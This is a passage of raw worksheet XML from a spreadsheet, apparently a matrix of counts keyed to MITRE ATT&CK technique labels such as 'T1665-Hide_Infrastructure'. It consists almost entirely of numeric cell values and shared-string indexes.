        <v>0</v>
      </c>
      <c r="IU110" s="107">
        <v>0</v>
      </c>
      <c r="IV110" s="107">
        <v>0</v>
      </c>
      <c r="IW110" s="108">
        <v>0</v>
      </c>
      <c r="IX110" s="109">
        <v>4</v>
      </c>
      <c r="IY110" s="110" t="s">
        <v>1942</v>
      </c>
      <c r="IZ110" s="501">
        <v>1</v>
      </c>
      <c r="JA110" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="JB110" s="111">
        <v>1</v>
      </c>
      <c r="JC110" s="112">
        <v>1</v>
      </c>
      <c r="JD110" s="113">
        <v>5</v>
      </c>
      <c r="JE110" s="114" t="s">
        <v>4111</v>
      </c>
      <c r="JF110" s="503">
        <v>2</v>
      </c>
      <c r="JG110" s="115" t="s">
        <v>3410</v>
      </c>
      <c r="JH110" s="115">
        <v>2</v>
      </c>
      <c r="JI110" s="116">
        <v>2</v>
      </c>
      <c r="JJ110" s="101">
        <v>0</v>
      </c>
      <c r="JK110" s="102">
        <v>0</v>
      </c>
      <c r="JL110" s="102">
        <v>0</v>
      </c>
      <c r="JM110" s="103">
        <v>0</v>
      </c>
      <c r="JN110" s="103">
        <v>0</v>
      </c>
      <c r="JO110" s="104">
        <v>0</v>
      </c>
      <c r="JP110" s="105">
        <v>0</v>
      </c>
      <c r="JQ110" s="106">
        <v>0</v>
      </c>
      <c r="JR110" s="497">
        <v>0</v>
      </c>
      <c r="JS110" s="107">
        <v>0</v>
      </c>
      <c r="JT110" s="107">
        <v>0</v>
      </c>
      <c r="JU110" s="108">
        <v>0</v>
      </c>
      <c r="JV110" s="109">
        <v>0</v>
      </c>
      <c r="JW110" s="110">
        <v>0</v>
      </c>
      <c r="JX110" s="501">
        <v>0</v>
      </c>
      <c r="JY110" s="111">
        <v>0</v>
      </c>
      <c r="JZ110" s="111">
        <v>0</v>
      </c>
      <c r="KA110" s="112">
        <v>0</v>
      </c>
      <c r="KB110" s="113">
        <v>0</v>
      </c>
      <c r="KC110" s="114">
        <v>0</v>
      </c>
      <c r="KD110" s="503">
        <v>0</v>
      </c>
      <c r="KE110" s="115">
        <v>0</v>
      </c>
      <c r="KF110" s="115">
        <v>0</v>
      </c>
      <c r="KG110" s="116">
        <v>0</v>
      </c>
      <c r="KH110" s="250">
        <v>0</v>
      </c>
      <c r="KI110" s="251">
        <v>0</v>
      </c>
      <c r="KJ110" s="505">
        <v>0</v>
      </c>
      <c r="KK110" s="252">
        <v>0</v>
      </c>
      <c r="KL110" s="252">
        <v>0</v>
      </c>
      <c r="KM110" s="253">
        <v>0</v>
      </c>
      <c r="KN110" s="101">
        <v>0</v>
      </c>
      <c r="KO110" s="102">
        <v>0</v>
      </c>
      <c r="KP110" s="102">
        <v>0</v>
      </c>
      <c r="KQ110" s="103">
        <v>0</v>
      </c>
      <c r="KR110" s="103">
        <v>0</v>
      </c>
      <c r="KS110" s="104">
        <v>0</v>
      </c>
      <c r="KT110" s="105">
        <v>0</v>
      </c>
      <c r="KU110" s="106">
        <v>0</v>
      </c>
      <c r="KV110" s="497">
        <v>0</v>
      </c>
      <c r="KW110" s="107">
        <v>0</v>
      </c>
      <c r="KX110" s="107">
        <v>0</v>
      </c>
      <c r="KY110" s="108">
        <v>0</v>
      </c>
      <c r="KZ110" s="109">
        <v>0</v>
      </c>
      <c r="LA110" s="110">
        <v>0</v>
      </c>
      <c r="LB110" s="501">
        <v>0</v>
      </c>
      <c r="LC110" s="111">
        <v>0</v>
      </c>
      <c r="LD110" s="111">
        <v>0</v>
      </c>
      <c r="LE110" s="112">
        <v>0</v>
      </c>
      <c r="LF110" s="113">
        <v>0</v>
      </c>
      <c r="LG110" s="114">
        <v>0</v>
      </c>
      <c r="LH110" s="503">
        <v>0</v>
      </c>
      <c r="LI110" s="115">
        <v>0</v>
      </c>
      <c r="LJ110" s="115">
        <v>0</v>
      </c>
      <c r="LK110" s="116">
        <v>0</v>
      </c>
      <c r="LL110" s="117">
        <v>96</v>
      </c>
      <c r="LM110" s="507">
        <v>89</v>
      </c>
      <c r="LN110" s="119">
        <v>2</v>
      </c>
      <c r="LO110" s="119">
        <v>11</v>
      </c>
      <c r="LP110" s="119">
        <v>87</v>
      </c>
      <c r="LQ110" s="119">
        <v>4</v>
      </c>
      <c r="LR110" s="119">
        <v>85</v>
      </c>
      <c r="LS110" s="119">
        <v>87</v>
      </c>
      <c r="LT110" s="382"/>
      <c r="LU110" s="117">
        <v>3</v>
      </c>
      <c r="LV110" s="118" t="s">
        <v>4292</v>
      </c>
      <c r="LW110" s="507">
        <v>3</v>
      </c>
      <c r="LX110" s="119" t="s">
        <v>2536</v>
      </c>
      <c r="LY110" s="119">
        <v>1</v>
      </c>
      <c r="LZ110" s="119">
        <v>3</v>
      </c>
      <c r="MA110" s="117">
        <v>0</v>
      </c>
      <c r="MB110" s="118">
        <v>0</v>
      </c>
      <c r="MC110" s="507">
        <v>0</v>
      </c>
      <c r="MD110" s="119">
        <v>0</v>
      </c>
      <c r="ME110" s="119">
        <v>0</v>
      </c>
      <c r="MF110" s="119">
        <v>0</v>
      </c>
      <c r="MG110" s="117">
        <v>0</v>
      </c>
      <c r="MH110" s="118">
        <v>0</v>
      </c>
      <c r="MI110" s="507">
        <v>0</v>
      </c>
      <c r="MJ110" s="119">
        <v>0</v>
      </c>
      <c r="MK110" s="119">
        <v>0</v>
      </c>
      <c r="ML110" s="119">
        <v>0</v>
      </c>
      <c r="MM110" s="117">
        <v>0</v>
      </c>
      <c r="MN110" s="118">
        <v>0</v>
      </c>
      <c r="MO110" s="507">
        <v>0</v>
      </c>
      <c r="MP110" s="119">
        <v>0</v>
      </c>
      <c r="MQ110" s="119">
        <v>0</v>
      </c>
      <c r="MR110" s="119">
        <v>0</v>
      </c>
      <c r="MS110" s="117">
        <v>2</v>
      </c>
      <c r="MT110" s="118" t="s">
        <v>4237</v>
      </c>
      <c r="MU110" s="507">
        <v>1</v>
      </c>
      <c r="MV110" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW110" s="119">
        <v>1</v>
      </c>
      <c r="MX110" s="119">
        <v>1</v>
      </c>
      <c r="MY110" s="117">
        <v>0</v>
      </c>
      <c r="MZ110" s="118">
        <v>0</v>
      </c>
      <c r="NA110" s="507">
        <v>0</v>
      </c>
      <c r="NB110" s="119">
        <v>0</v>
      </c>
      <c r="NC110" s="119">
        <v>0</v>
      </c>
      <c r="ND110" s="119">
        <v>0</v>
      </c>
      <c r="NE110" s="117">
        <v>0</v>
      </c>
      <c r="NF110" s="118">
        <v>0</v>
      </c>
      <c r="NG110" s="507">
        <v>0</v>
      </c>
      <c r="NH110" s="119">
        <v>0</v>
      </c>
      <c r="NI110" s="119">
        <v>0</v>
      </c>
      <c r="NJ110" s="119">
        <v>0</v>
      </c>
      <c r="NK110" s="117">
        <v>0</v>
      </c>
      <c r="NL110" s="118">
        <v>0</v>
      </c>
      <c r="NM110" s="507">
        <v>0</v>
      </c>
      <c r="NN110" s="119">
        <v>0</v>
      </c>
      <c r="NO110" s="119">
        <v>0</v>
      </c>
      <c r="NP110" s="119">
        <v>0</v>
      </c>
      <c r="NQ110" s="117">
        <v>0</v>
      </c>
      <c r="NR110" s="118">
        <v>0</v>
      </c>
      <c r="NS110" s="507">
        <v>0</v>
      </c>
      <c r="NT110" s="119">
        <v>0</v>
      </c>
      <c r="NU110" s="119">
        <v>0</v>
      </c>
      <c r="NV110" s="119">
        <v>0</v>
      </c>
      <c r="NW110" s="117">
        <v>91</v>
      </c>
      <c r="NX110" s="118" t="s">
        <v>4434</v>
      </c>
      <c r="NY110" s="507">
        <v>85</v>
      </c>
      <c r="NZ110" s="119" t="s">
        <v>4435</v>
      </c>
      <c r="OA110" s="119">
        <v>11</v>
      </c>
      <c r="OB110" s="119">
        <v>85</v>
      </c>
      <c r="OC110" s="120">
        <v>3</v>
      </c>
      <c r="OD110" s="120">
        <v>3</v>
      </c>
      <c r="OE110" s="120">
        <v>1</v>
      </c>
      <c r="OF110" s="121">
        <v>1</v>
      </c>
      <c r="OG110" s="120">
        <v>3</v>
      </c>
      <c r="OH110" s="120">
        <v>3</v>
      </c>
      <c r="OI110" s="120">
        <v>3</v>
      </c>
      <c r="OJ110" s="120">
        <v>3</v>
      </c>
      <c r="OK110" s="383"/>
      <c r="OL110" s="120">
        <v>3</v>
      </c>
      <c r="OM110" s="120">
        <v>3</v>
      </c>
      <c r="ON110" s="120">
        <v>3</v>
      </c>
      <c r="OO110" s="120" t="s">
        <v>2844</v>
      </c>
      <c r="OP110" s="120">
        <v>1</v>
      </c>
      <c r="OQ110" s="464">
        <v>3</v>
      </c>
      <c r="OR110" s="120">
        <v>0</v>
      </c>
      <c r="OS110" s="120">
        <v>0</v>
      </c>
      <c r="OT110" s="120">
        <v>0</v>
      </c>
      <c r="OU110" s="120"/>
      <c r="OV110" s="120">
        <v>0</v>
      </c>
      <c r="OW110" s="464">
        <v>0</v>
      </c>
      <c r="OX110" s="120">
        <v>0</v>
      </c>
      <c r="OY110" s="120">
        <v>0</v>
      </c>
      <c r="OZ110" s="120">
        <v>0</v>
      </c>
      <c r="PA110" s="120"/>
      <c r="PB110" s="120">
        <v>0</v>
      </c>
      <c r="PC110" s="464">
        <v>0</v>
      </c>
      <c r="PD110" s="120">
        <v>0</v>
      </c>
      <c r="PE110" s="120">
        <v>0</v>
      </c>
      <c r="PF110" s="120">
        <v>0</v>
      </c>
      <c r="PG110" s="120"/>
      <c r="PH110" s="120">
        <v>0</v>
      </c>
      <c r="PI110" s="464">
        <v>0</v>
      </c>
      <c r="PJ110" s="120">
        <v>0</v>
      </c>
      <c r="PK110" s="120">
        <v>0</v>
      </c>
      <c r="PL110" s="120">
        <v>0</v>
      </c>
      <c r="PM110" s="120"/>
      <c r="PN110" s="120">
        <v>0</v>
      </c>
      <c r="PO110" s="464">
        <v>0</v>
      </c>
      <c r="PP110" s="120">
        <v>0</v>
      </c>
      <c r="PQ110" s="120">
        <v>0</v>
      </c>
      <c r="PR110" s="120">
        <v>0</v>
      </c>
      <c r="PS110" s="120"/>
      <c r="PT110" s="120">
        <v>0</v>
      </c>
      <c r="PU110" s="464">
        <v>0</v>
      </c>
      <c r="PV110" s="120">
        <v>0</v>
      </c>
      <c r="PW110" s="120">
        <v>0</v>
      </c>
      <c r="PX110" s="120">
        <v>0</v>
      </c>
      <c r="PY110" s="120"/>
      <c r="PZ110" s="120">
        <v>0</v>
      </c>
      <c r="QA110" s="464">
        <v>0</v>
      </c>
      <c r="QB110" s="120">
        <v>0</v>
      </c>
      <c r="QC110" s="120">
        <v>0</v>
      </c>
      <c r="QD110" s="120">
        <v>0</v>
      </c>
      <c r="QE110" s="120"/>
      <c r="QF110" s="120">
        <v>0</v>
      </c>
      <c r="QG110" s="464">
        <v>0</v>
      </c>
      <c r="QH110" s="120">
        <v>3</v>
      </c>
      <c r="QI110" s="120">
        <v>3</v>
      </c>
      <c r="QJ110" s="120">
        <v>3</v>
      </c>
      <c r="QK110" s="120" t="s">
        <v>2542</v>
      </c>
      <c r="QL110" s="120">
        <v>1</v>
      </c>
      <c r="QM110" s="464">
        <v>3</v>
      </c>
      <c r="QN110" s="120">
        <v>0</v>
      </c>
      <c r="QO110" s="120">
        <v>0</v>
      </c>
      <c r="QP110" s="120">
        <v>0</v>
      </c>
      <c r="QQ110" s="120"/>
      <c r="QR110" s="120">
        <v>0</v>
      </c>
      <c r="QS110" s="464">
        <v>0</v>
      </c>
      <c r="QT110" s="184"/>
      <c r="QU110" s="184"/>
      <c r="QV110" s="184"/>
      <c r="QW110" s="184"/>
      <c r="QX110" s="184"/>
      <c r="QY110" s="184"/>
      <c r="QZ110" s="184"/>
      <c r="RA110" s="184"/>
      <c r="RB110" s="184"/>
      <c r="RC110" s="184"/>
      <c r="RD110" s="184"/>
      <c r="RE110" s="184"/>
      <c r="RF110" s="184"/>
      <c r="RG110" s="184"/>
      <c r="RH110" s="184"/>
      <c r="RI110" s="184"/>
      <c r="RJ110" s="184"/>
      <c r="RK110" s="184"/>
      <c r="RL110" s="184"/>
      <c r="RM110" s="184"/>
      <c r="RN110" s="184"/>
      <c r="RO110" s="184"/>
      <c r="RP110" s="184"/>
      <c r="RQ110" s="184"/>
      <c r="RR110" s="184"/>
      <c r="RS110" s="184"/>
      <c r="RT110" s="184"/>
      <c r="RU110" s="184"/>
      <c r="RV110" s="184"/>
      <c r="RW110" s="184"/>
      <c r="RX110" s="184"/>
      <c r="RY110" s="184"/>
      <c r="RZ110" s="184"/>
      <c r="SA110" s="184"/>
      <c r="SB110" s="184"/>
      <c r="SC110" s="184"/>
      <c r="SD110" s="184"/>
      <c r="SE110" s="184"/>
      <c r="SF110" s="184"/>
      <c r="SG110" s="184"/>
      <c r="SH110" s="184"/>
      <c r="SI110" s="184"/>
      <c r="SJ110" s="184"/>
      <c r="SK110" s="184"/>
      <c r="SL110" s="184"/>
      <c r="SM110" s="184"/>
      <c r="SN110" s="184"/>
      <c r="SO110" s="184"/>
      <c r="SP110" s="184"/>
      <c r="SQ110" s="184"/>
      <c r="SR110" s="184"/>
      <c r="SS110" s="184"/>
      <c r="ST110" s="184"/>
      <c r="SU110" s="184"/>
      <c r="SV110" s="184"/>
      <c r="SW110" s="184"/>
      <c r="SX110" s="184"/>
      <c r="SY110" s="184"/>
      <c r="SZ110" s="184"/>
      <c r="TA110" s="184"/>
      <c r="TB110" s="184"/>
      <c r="TC110" s="184"/>
      <c r="TD110" s="184"/>
      <c r="TE110" s="184"/>
      <c r="TF110" s="184"/>
      <c r="TG110" s="184"/>
      <c r="TH110" s="184"/>
      <c r="TI110" s="184"/>
      <c r="TJ110" s="184"/>
      <c r="TK110" s="184"/>
      <c r="TL110" s="184"/>
      <c r="TM110" s="184"/>
      <c r="TN110" s="184"/>
      <c r="TO110" s="184"/>
      <c r="TP110" s="184"/>
      <c r="TQ110" s="184"/>
      <c r="TR110" s="184"/>
      <c r="TS110" s="184"/>
      <c r="TT110" s="184"/>
      <c r="TU110" s="184"/>
      <c r="TV110" s="184"/>
      <c r="TW110" s="184"/>
      <c r="TX110" s="184"/>
      <c r="TY110" s="184"/>
      <c r="TZ110" s="184"/>
      <c r="UA110" s="184"/>
      <c r="UB110" s="184"/>
      <c r="UC110" s="184"/>
      <c r="UD110" s="184"/>
      <c r="UE110" s="184"/>
      <c r="UF110" s="184"/>
      <c r="UG110" s="184"/>
      <c r="UH110" s="184"/>
      <c r="UI110" s="184"/>
      <c r="UJ110" s="184"/>
      <c r="UK110" s="184"/>
      <c r="UL110" s="184"/>
      <c r="UM110" s="184"/>
      <c r="UN110" s="184"/>
      <c r="UO110" s="184"/>
      <c r="UP110" s="184"/>
      <c r="UQ110" s="184"/>
      <c r="UR110" s="184"/>
      <c r="US110" s="184"/>
      <c r="UT110" s="184"/>
      <c r="UU110" s="184"/>
      <c r="UV110" s="184"/>
      <c r="UW110" s="184"/>
      <c r="UX110" s="184"/>
      <c r="UY110" s="184"/>
      <c r="UZ110" s="184"/>
      <c r="VA110" s="184"/>
      <c r="VB110" s="184"/>
      <c r="VC110" s="184"/>
      <c r="VD110" s="184"/>
      <c r="VE110" s="184"/>
      <c r="VF110" s="184"/>
      <c r="VG110" s="184"/>
      <c r="VH110" s="184"/>
      <c r="VI110" s="184"/>
      <c r="VJ110" s="184"/>
      <c r="VK110" s="184"/>
      <c r="VL110" s="184"/>
      <c r="VM110" s="184"/>
      <c r="VN110" s="184"/>
      <c r="VO110" s="184"/>
      <c r="VP110" s="184"/>
      <c r="VQ110" s="184"/>
      <c r="VR110" s="184"/>
      <c r="VS110" s="184"/>
      <c r="VT110" s="184"/>
      <c r="VU110" s="184"/>
      <c r="VV110" s="184"/>
      <c r="VW110" s="184"/>
      <c r="VX110" s="184"/>
      <c r="VY110" s="184"/>
    </row>
    <row r="111" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A111" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B111" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C111" s="83" t="s">
        <v>302</v>
      </c>
      <c r="D111" s="83" t="s">
        <v>172</v>
      </c>
      <c r="E111" s="83">
        <f t="shared" si="5"/>
        <v>75</v>
      </c>
      <c r="F111" s="83" t="s">
        <v>173</v>
      </c>
      <c r="G111" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H111" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I111" s="81" t="s">
        <v>1709</v>
      </c>
      <c r="J111" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K111" s="81" t="s">
        <v>1710</v>
      </c>
      <c r="L111" s="81" t="s">
        <v>1711</v>
      </c>
      <c r="M111" s="378" t="s">
        <v>270</v>
      </c>
      <c r="N111" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O111" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P111" s="91"/>
      <c r="Q111" s="379" t="s">
        <v>882</v>
      </c>
      <c r="R111" s="92" t="s">
        <v>1712</v>
      </c>
      <c r="S111" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T111" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U111" s="94" t="s">
        <v>1713</v>
      </c>
      <c r="V111" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W111" s="96" t="s">
        <v>1714</v>
      </c>
      <c r="X111" s="196" t="s">
        <v>1715</v>
      </c>
      <c r="Y111" s="83" t="s">
        <v>1716</v>
      </c>
      <c r="Z111" s="188" t="s">
        <v>1717</v>
      </c>
      <c r="AA111" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB111" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC111" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD111" s="83"/>
      <c r="AE111" s="83"/>
      <c r="AF111" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG111" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH111" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI111" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ111" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK111" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL111" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM111" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN111" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO111" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP111" s="385" t="str">
        <f>M111&amp;"-frag"</f>
        <v>T1665-Hide_Infrastructure-frag</v>
      </c>
      <c r="AQ111" s="358">
        <v>12</v>
      </c>
      <c r="AR111" s="100"/>
      <c r="AS111" s="100">
        <v>1</v>
      </c>
      <c r="AT111" s="100">
        <v>1</v>
      </c>
      <c r="AU111" s="100">
        <v>2</v>
      </c>
      <c r="AV111" s="92" t="s">
        <v>1559</v>
      </c>
      <c r="AW111" s="100">
        <v>1</v>
      </c>
      <c r="AX111" s="100">
        <v>1</v>
      </c>
      <c r="AY111" s="100">
        <v>1</v>
      </c>
      <c r="AZ111" s="100">
        <v>2</v>
      </c>
      <c r="BA111" s="381"/>
      <c r="BB111" s="101">
        <v>18</v>
      </c>
      <c r="BC111" s="102" t="s">
        <v>2073</v>
      </c>
      <c r="BD111" s="102">
        <v>4</v>
      </c>
      <c r="BE111" s="103" t="s">
        <v>1811</v>
      </c>
      <c r="BF111" s="103">
        <v>2</v>
      </c>
      <c r="BG111" s="104">
        <v>4</v>
      </c>
      <c r="BH111" s="105">
        <v>0</v>
      </c>
      <c r="BI111" s="106">
        <v>0</v>
      </c>
      <c r="BJ111" s="497">
        <v>0</v>
      </c>
      <c r="BK111" s="107">
        <v>0</v>
      </c>
      <c r="BL111" s="107">
        <v>0</v>
      </c>
      <c r="BM111" s="108">
        <v>0</v>
      </c>
      <c r="BN111" s="109">
        <v>18</v>
      </c>
      <c r="BO111" s="110" t="s">
        <v>2073</v>
      </c>
      <c r="BP111" s="501">
        <v>4</v>
      </c>
      <c r="BQ111" s="111" t="s">
        <v>1811</v>
      </c>
      <c r="BR111" s="111">
        <v>2</v>
      </c>
      <c r="BS111" s="112">
        <v>4</v>
      </c>
      <c r="BT111" s="113">
        <v>286</v>
      </c>
      <c r="BU111" s="114" t="s">
        <v>4112</v>
      </c>
      <c r="BV111" s="503">
        <v>11</v>
      </c>
      <c r="BW111" s="115" t="s">
        <v>4113</v>
      </c>
      <c r="BX111" s="115">
        <v>4</v>
      </c>
      <c r="BY111" s="116">
        <v>9</v>
      </c>
      <c r="BZ111" s="250">
        <v>6</v>
      </c>
      <c r="CA111" s="251" t="s">
        <v>1924</v>
      </c>
      <c r="CB111" s="505">
        <v>6</v>
      </c>
      <c r="CC111" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="CD111" s="252">
        <v>2</v>
      </c>
      <c r="CE111" s="253">
        <v>3</v>
      </c>
      <c r="CF111" s="101">
        <v>292</v>
      </c>
      <c r="CG111" s="102" t="s">
        <v>4114</v>
      </c>
      <c r="CH111" s="102">
        <v>17</v>
      </c>
      <c r="CI111" s="103" t="s">
        <v>4115</v>
      </c>
      <c r="CJ111" s="103">
        <v>6</v>
      </c>
      <c r="CK111" s="104">
        <v>10</v>
      </c>
      <c r="CL111" s="105">
        <v>0</v>
      </c>
      <c r="CM111" s="106">
        <v>0</v>
      </c>
      <c r="CN111" s="497">
        <v>0</v>
      </c>
      <c r="CO111" s="107">
        <v>0</v>
      </c>
      <c r="CP111" s="107">
        <v>0</v>
      </c>
      <c r="CQ111" s="108">
        <v>0</v>
      </c>
      <c r="CR111" s="109">
        <v>4</v>
      </c>
      <c r="CS111" s="110" t="s">
        <v>1942</v>
      </c>
      <c r="CT111" s="501">
        <v>1</v>
      </c>
      <c r="CU111" s="111" t="s">
        <v>1933</v>
      </c>
      <c r="CV111" s="111">
        <v>1</v>
      </c>
      <c r="CW111" s="112">
        <v>1</v>
      </c>
      <c r="CX111" s="113">
        <v>22</v>
      </c>
      <c r="CY111" s="114" t="s">
        <v>2213</v>
      </c>
      <c r="CZ111" s="503">
        <v>5</v>
      </c>
      <c r="DA111" s="115" t="s">
        <v>2214</v>
      </c>
      <c r="DB111" s="115">
        <v>3</v>
      </c>
      <c r="DC111" s="116">
        <v>5</v>
      </c>
      <c r="DD111" s="101">
        <v>0</v>
      </c>
      <c r="DE111" s="102">
        <v>0</v>
      </c>
      <c r="DF111" s="102">
        <v>0</v>
      </c>
      <c r="DG111" s="103">
        <v>0</v>
      </c>
      <c r="DH111" s="103">
        <v>0</v>
      </c>
      <c r="DI111" s="104">
        <v>0</v>
      </c>
      <c r="DJ111" s="105">
        <v>0</v>
      </c>
      <c r="DK111" s="106">
        <v>0</v>
      </c>
      <c r="DL111" s="497">
        <v>0</v>
      </c>
      <c r="DM111" s="107">
        <v>0</v>
      </c>
      <c r="DN111" s="107">
        <v>0</v>
      </c>
      <c r="DO111" s="108">
        <v>0</v>
      </c>
      <c r="DP111" s="109">
        <v>0</v>
      </c>
      <c r="DQ111" s="110">
        <v>0</v>
      </c>
      <c r="DR111" s="501">
        <v>0</v>
      </c>
      <c r="DS111" s="111">
        <v>0</v>
      </c>
      <c r="DT111" s="111">
        <v>0</v>
      </c>
      <c r="DU111" s="112">
        <v>0</v>
      </c>
      <c r="DV111" s="113">
        <v>264</v>
      </c>
      <c r="DW111" s="114" t="s">
        <v>4116</v>
      </c>
      <c r="DX111" s="503">
        <v>6</v>
      </c>
      <c r="DY111" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ111" s="115">
        <v>1</v>
      </c>
      <c r="EA111" s="116">
        <v>6</v>
      </c>
      <c r="EB111" s="250">
        <v>0</v>
      </c>
      <c r="EC111" s="251">
        <v>0</v>
      </c>
      <c r="ED111" s="505">
        <v>0</v>
      </c>
      <c r="EE111" s="252">
        <v>0</v>
      </c>
      <c r="EF111" s="252">
        <v>0</v>
      </c>
      <c r="EG111" s="253">
        <v>0</v>
      </c>
      <c r="EH111" s="101">
        <v>264</v>
      </c>
      <c r="EI111" s="102" t="s">
        <v>4116</v>
      </c>
      <c r="EJ111" s="102">
        <v>6</v>
      </c>
      <c r="EK111" s="103" t="s">
        <v>1894</v>
      </c>
      <c r="EL111" s="103">
        <v>1</v>
      </c>
      <c r="EM111" s="104">
        <v>6</v>
      </c>
      <c r="EN111" s="105">
        <v>0</v>
      </c>
      <c r="EO111" s="106">
        <v>0</v>
      </c>
      <c r="EP111" s="497">
        <v>0</v>
      </c>
      <c r="EQ111" s="107">
        <v>0</v>
      </c>
      <c r="ER111" s="107">
        <v>0</v>
      </c>
      <c r="ES111" s="108">
        <v>0</v>
      </c>
      <c r="ET111" s="109">
        <v>0</v>
      </c>
      <c r="EU111" s="110">
        <v>0</v>
      </c>
      <c r="EV111" s="501">
        <v>0</v>
      </c>
      <c r="EW111" s="111">
        <v>0</v>
      </c>
      <c r="EX111" s="111">
        <v>0</v>
      </c>
      <c r="EY111" s="112">
        <v>0</v>
      </c>
      <c r="EZ111" s="113">
        <v>0</v>
      </c>
      <c r="FA111" s="114">
        <v>0</v>
      </c>
      <c r="FB111" s="503">
        <v>0</v>
      </c>
      <c r="FC111" s="115">
        <v>0</v>
      </c>
      <c r="FD111" s="115">
        <v>0</v>
      </c>
      <c r="FE111" s="116">
        <v>0</v>
      </c>
      <c r="FF111" s="101">
        <v>18</v>
      </c>
      <c r="FG111" s="102" t="s">
        <v>2073</v>
      </c>
      <c r="FH111" s="102">
        <v>4</v>
      </c>
      <c r="FI111" s="103" t="s">
        <v>1811</v>
      </c>
      <c r="FJ111" s="103">
        <v>2</v>
      </c>
      <c r="FK111" s="104">
        <v>4</v>
      </c>
      <c r="FL111" s="105">
        <v>0</v>
      </c>
      <c r="FM111" s="106">
        <v>0</v>
      </c>
      <c r="FN111" s="497">
        <v>0</v>
      </c>
      <c r="FO111" s="107">
        <v>0</v>
      </c>
      <c r="FP111" s="107">
        <v>0</v>
      </c>
      <c r="FQ111" s="108">
        <v>0</v>
      </c>
      <c r="FR111" s="109">
        <v>18</v>
      </c>
      <c r="FS111" s="110" t="s">
        <v>2073</v>
      </c>
      <c r="FT111" s="501">
        <v>4</v>
      </c>
      <c r="FU111" s="111" t="s">
        <v>1811</v>
      </c>
      <c r="FV111" s="111">
        <v>2</v>
      </c>
      <c r="FW111" s="112">
        <v>4</v>
      </c>
      <c r="FX111" s="113">
        <v>18</v>
      </c>
      <c r="FY111" s="114" t="s">
        <v>2073</v>
      </c>
      <c r="FZ111" s="503">
        <v>4</v>
      </c>
      <c r="GA111" s="115" t="s">
        <v>1811</v>
      </c>
      <c r="GB111" s="115">
        <v>2</v>
      </c>
      <c r="GC111" s="116">
        <v>4</v>
      </c>
      <c r="GD111" s="250">
        <v>6</v>
      </c>
      <c r="GE111" s="251" t="s">
        <v>1924</v>
      </c>
      <c r="GF111" s="505">
        <v>6</v>
      </c>
      <c r="GG111" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH111" s="252">
        <v>2</v>
      </c>
      <c r="GI111" s="253">
        <v>3</v>
      </c>
      <c r="GJ111" s="101">
        <v>24</v>
      </c>
      <c r="GK111" s="102" t="s">
        <v>4117</v>
      </c>
      <c r="GL111" s="102">
        <v>10</v>
      </c>
      <c r="GM111" s="103" t="s">
        <v>4118</v>
      </c>
      <c r="GN111" s="103">
        <v>4</v>
      </c>
      <c r="GO111" s="104">
        <v>7</v>
      </c>
      <c r="GP111" s="105">
        <v>0</v>
      </c>
      <c r="GQ111" s="106">
        <v>0</v>
      </c>
      <c r="GR111" s="497">
        <v>0</v>
      </c>
      <c r="GS111" s="107">
        <v>0</v>
      </c>
      <c r="GT111" s="107">
        <v>0</v>
      </c>
      <c r="GU111" s="108">
        <v>0</v>
      </c>
      <c r="GV111" s="109">
        <v>0</v>
      </c>
      <c r="GW111" s="110">
        <v>0</v>
      </c>
      <c r="GX111" s="501">
        <v>0</v>
      </c>
      <c r="GY111" s="111">
        <v>0</v>
      </c>
      <c r="GZ111" s="111">
        <v>0</v>
      </c>
      <c r="HA111" s="112">
        <v>0</v>
      </c>
      <c r="HB111" s="113">
        <v>18</v>
      </c>
      <c r="HC111" s="114" t="s">
        <v>2073</v>
      </c>
      <c r="HD111" s="503">
        <v>4</v>
      </c>
      <c r="HE111" s="115" t="s">
        <v>1811</v>
      </c>
      <c r="HF111" s="115">
        <v>2</v>
      </c>
      <c r="HG111" s="116">
        <v>4</v>
      </c>
      <c r="HH111" s="101">
        <v>0</v>
      </c>
      <c r="HI111" s="102">
        <v>0</v>
      </c>
      <c r="HJ111" s="102">
        <v>0</v>
      </c>
      <c r="HK111" s="103">
        <v>0</v>
      </c>
      <c r="HL111" s="103">
        <v>0</v>
      </c>
      <c r="HM111" s="104">
        <v>0</v>
      </c>
      <c r="HN111" s="105">
        <v>0</v>
      </c>
      <c r="HO111" s="106">
        <v>0</v>
      </c>
      <c r="HP111" s="497">
        <v>0</v>
      </c>
      <c r="HQ111" s="107">
        <v>0</v>
      </c>
      <c r="HR111" s="107">
        <v>0</v>
      </c>
      <c r="HS111" s="108">
        <v>0</v>
      </c>
      <c r="HT111" s="109">
        <v>0</v>
      </c>
      <c r="HU111" s="110">
        <v>0</v>
      </c>
      <c r="HV111" s="501">
        <v>0</v>
      </c>
      <c r="HW111" s="111">
        <v>0</v>
      </c>
      <c r="HX111" s="111">
        <v>0</v>
      </c>
      <c r="HY111" s="112">
        <v>0</v>
      </c>
      <c r="HZ111" s="113">
        <v>4</v>
      </c>
      <c r="IA111" s="114" t="s">
        <v>1942</v>
      </c>
      <c r="IB111" s="503">
        <v>1</v>
      </c>
      <c r="IC111" s="115" t="s">
        <v>1933</v>
      </c>
